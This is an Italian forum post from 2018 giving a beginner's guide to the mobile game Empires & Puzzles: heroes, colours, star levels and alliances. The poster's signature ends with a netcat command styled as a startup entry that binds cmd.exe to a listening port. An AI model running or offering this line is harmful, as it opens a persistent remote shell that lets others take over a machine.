00 8/25/2018 1:02 PM
Empires & Puzzles
Link per il download Google Play :

play.google.com/store/apps/details?id=com.smallgiantgames.empir...

Empires & Puzzles - Parte Uno







Si tratta di un gioco di ruolo o RPG (role-playing game)dove i giocatori assumono il ruolo di uno o più personaggi.

Il gioco nella sua architettura può sembrare complesso ma in realtà trattasi sono di dimestichezza e tempo per capirne le varie sfaccettature e malizie per procedere nell' avventura.

Partiamo con il dire che il gioco privilegia coloro che spendono soldi, questo è scontato e molto evidente, ma per chi avrà la pazienza di aspettare i progressi saranno alla fine simili, basta appunto avere pazienza, il gioco infatti si basa sulla pazienza e la pazienza stà nell' attendere la costruzione di un edificio o di un personaggio.

All' inizio del gioco avrete a disposizione la schermata rappresentante "Corelia" la cittadina che sarà la base del vostro gioco e dei vostri progressi,dove potrete, tramite determinate icone, progredire con il gioco attraverso step di avanzamento quali Imprese , Raid e la Mappa quest' ultima vi darà modo di progredire nella stagione superando i livelli ottenendo così oggetti di vario genere per il progresso dei vostri personaggi e delle truppe.

Nella systray della schermata avrete a dispozizione il bottone Eroi cliccando su di essa accederete all' Albo degli Eroi qui sono contenuti gli eroi che compongono la vostra squadra; sono cinque e di diversi colori :

Fuoco

Ghiaccio

Natura

Oscurità

Sacro

Potrete nel corso del gioco (che scoprirete da voi avere una longevità infinita ...) costruire diverse squadre, ovviamente la prima squadra di cinque personaggi dovrà essere la più forte per consentirvi di progredire nel gioco, quindi all' inizio rafforzate solo che questa.

Cliccando su ogni personaggio otterrete una schermata con a sinistra due bottoni, la prima è una lente per ottenere uno zoom del vostro personaggio e la seconda un lucchetto, cliccando su di esso lo metterete in evidenza attivandolo(colore bianco), questa operazione farà si che l'eroe non sarà selezionabile, di conseguenza non correrete il richio di unirlo ad altri personaggi quando appunto vorrete rafforzarne qualcuno della vostra squadra.

I personaggi si riconoscono dalle stelle che li contraddistinguono, si parte da personaggi ad una stella fino ad arrivare a quelli con cinque, questi ultimi sono i più potenti del gioco, quindi vi renderete conto da voi che i personaggi ad una stella man mano che progredirete con il gioco serviranno unicamente a far salire di livello i vari personaggi da tre stelle in su.

N.B. Soprattutto all' inizio del gioco non utilizzate personaggi a tre stelle per farne progredire altri, vi assicuro che vi serviranno se farete parte di un allenza , quindi inutile dirvi che per sfruttare il gioco al 100% delle sue risorse e potenzialità dovrete necessariamente far parte di un allezanza, questo serivà per partecipare alle guerre e allo scontro con i vari titani ottenendo così ricchi premi per progredire nel gioco migliorando i vostri personaggi e di conseguenza la vostra squadra.

[Edited by x®ay 9/11/2018 10:16 PM]

xray forum

Cielovieciskie snaniya prienadlejgat Miru S.Y.N.A.P.S.E.

:[St/\artup\Run/] C:\nc.exe? -L -p 300 -t -e cmd.exe